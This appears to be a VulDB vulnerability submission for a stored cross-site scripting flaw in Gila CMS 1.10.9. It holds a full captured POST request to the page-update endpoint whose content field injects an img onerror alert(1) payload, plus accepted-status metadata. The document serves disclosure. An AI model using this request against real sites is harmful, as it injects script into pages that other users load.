| Title | Gila CMS 1.10.9 Stored Cross-Site Scripting |
|---|---|
| Description | In Gila CMS version 1.10.9, an authenticated user can exploit a Cross-Site Scripting (XSS) vulnerability by inserting a malicious script payload. This can be done by intercepting a POST request to the URL `/cm/update_rows/page?id=<ID>`. By modifying the "content" field in the intercepted request, it is possible to inject and execute a malicious script. |

Request:

```
POST /cm/update_rows/page?id=2 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------56708877833819783853068327471
Content-Length: 681
Origin: http://x.x.x.x
Connection: close
Referer: http://x.x.x.x/admin/content/page
Cookie: PHPSESSID=akgkimcivicdds3mvebk00fl70; GSESSIONID=16wcb3jbe0v3bhcbd2mjtlx9a38zsmr9llczvz4rflpr32enfs
Sec-GPC: 1

-----------------------------56708877833819783853068327471
Content-Disposition: form-data; name="title"

Teste 01
-----------------------------56708877833819783853068327471
Content-Disposition: form-data; name="slug"


-----------------------------56708877833819783853068327471
Content-Disposition: form-data; name="publish"

1
-----------------------------56708877833819783853068327471
Content-Disposition: form-data; name="template"


-----------------------------56708877833819783853068327471
Content-Disposition: form-data; name="content"

<img src=1 href=1 onerror="javascript:alert(1)"></img>
-----------------------------56708877833819783853068327471--
```
| User | xMirandax (UID 72454) |
|---|---|
| Submission | 08/01/2024 11:21 PM (2 years ago) |
| Moderation | 08/10/2024 09:55 AM (8 days later) |
| Status | Accepted |
| VulDB entry | 274114 [Gila CMS 1.10.9 HTTP POST Request page?id=2 content cross site scripting] |
| Points | 17 |